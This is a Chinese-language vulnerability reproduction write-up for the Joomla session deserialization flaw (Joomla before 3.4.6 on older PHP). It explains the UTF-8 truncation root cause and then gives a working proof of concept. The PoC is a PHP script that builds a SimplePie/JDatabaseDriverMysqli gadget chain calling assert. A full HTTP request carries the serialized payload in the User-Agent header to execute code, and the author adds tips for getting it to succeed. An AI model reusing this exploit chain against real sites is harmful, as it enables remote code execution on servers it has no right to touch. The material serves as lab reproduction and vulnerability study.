0x01 简介
本漏洞根源是PHP5.6.13前的版本在读取存储好的session时,如果反序列化出错则会跳过当前一段数据而去反序列化下一段数据。而Joomla将session存储在Mysql数据库中,编码是utf8,当我们插入4字节的utf8数据时则会导致截断。截断后的数据在反序列化时就会失败,最后触发反序列化漏洞。
通过Joomla中的Gadget,可造成任意代码执行的结果。
0x02 影响版本
Joomla 1.5.x, 2.x, and 3.x before 3.4.6
PHP 5.6 < 5.6.13, PHP 5.5 < 5.5.29 and PHP 5.4 < 5.4.45
0x03 漏洞复现
1.我们先不带UA头,构造数据包如下,得到服务器返回的cookie。
2.运行下列poc生成脚本。
在线平台:
http://sandbox.onlinephpfunctions.com/code/17e7080841ccce12f6c6e0bb1de01b9e390510bd
<?php
class JSimplepieFactory {
}
class JDatabaseDriverMysql {
}
class SimplePie {
var $sanitize;
var $cache;
var $cache_name_function;
var $javascript;
var $feed_url;
function __construct()
{
$this->feed_url = "phpinfo();JFactory::getConfig();exit;";
$this->javascript = 9999;
$this->cache_name_function = "assert";
$this->sanitize = new JDatabaseDriverMysql();
$this->cache = true;
}
}
class JDatabaseDriverMysqli {
protected $a;
protected $disconnectHandlers;
protected $connection;
function __construct()
{
$this->a = new JSimplepieFactory();
$x = new SimplePie();
$this->connection = 1;
$this->disconnectHandlers = [
[$x, "init"],
];
}
}
$a = new JDatabaseDriverMysqli();
$poc = serialize($a);
$poc = str_replace("\x00*\x00", '\\0\\0\\0', $poc);
echo "123}__test|{$poc}\xF0\x9D\x8C\x86";
3.将生成好的POC作为User-Agent,带上第一步获取的Cookie发包,这一次发包,脏数据进入Mysql数据库。然后同样的包再发一次,我们的代码被执行:
GET / HTTP/1.1
Host: host:8080
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Connection: close
Cookie: b75d0a0a102c83a58752ca23c294bdfb=01ebc701d30c6a74457056da2ffeb2e7;
User-Agent: 123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}4
Content-Length: 2
最好按照我使用的那个数据包那样构造,poc也要用现生成的,不然可能会执行不成功。
0x04 参考
https://www.leavesongs.com/PENETRATION/joomla-unserialize-code-execute-vulnerability.html
https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2015-8562